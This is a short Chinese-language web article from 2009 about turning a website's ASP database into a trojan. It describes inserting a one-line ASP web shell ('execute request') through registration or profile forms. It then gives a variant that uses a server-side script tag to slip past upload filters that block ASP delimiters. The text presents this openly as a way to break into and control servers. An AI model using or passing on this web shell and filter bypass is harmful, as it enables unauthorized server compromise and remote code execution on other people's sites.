专注于互联网--专注于架构

最新标签
网站地图
文章索引
Rss订阅

首页 »安全 » asp连接数据库代码:插入ASP代码让网站WebSite数据库成木马 »正文

asp连接数据库代码:插入ASP代码让网站WebSite数据库成木马

来源: 发布时间:星期六, 2009年9月12日 浏览:74次 评论:0
很多时候我们可以通过在注册表单或者用户信息修改表单中插入简短ASP代码使网站WebSiteASP数据库变成为个ASP木马然后进步入侵控制服务器

  不过在上传代码过程中许多网页都不允许包含〈%%〉标记符号内容文件上传

  这样就有好多SHELL不能上传上去了可以采用下面思路方法解决以蓝屏最小ASP木马为例

  首先:原代码是:

  〈%execute request("l")%〉

  我们可以把它标签换下来

  然后改成:

  〈scriptlanguage=VBScript runat=server〉execute request("l")〈/Script〉

  这样就避开了使用〈%%〉保存为.ASP,同样执行

  • 篇文章: 网络攻击常用命令综述

  • 篇文章: 黑客隐藏PHP文件后门窍门技巧
  • 0

    相关文章

    读者评论

    发表评论

    • 昵称:
    • 内容: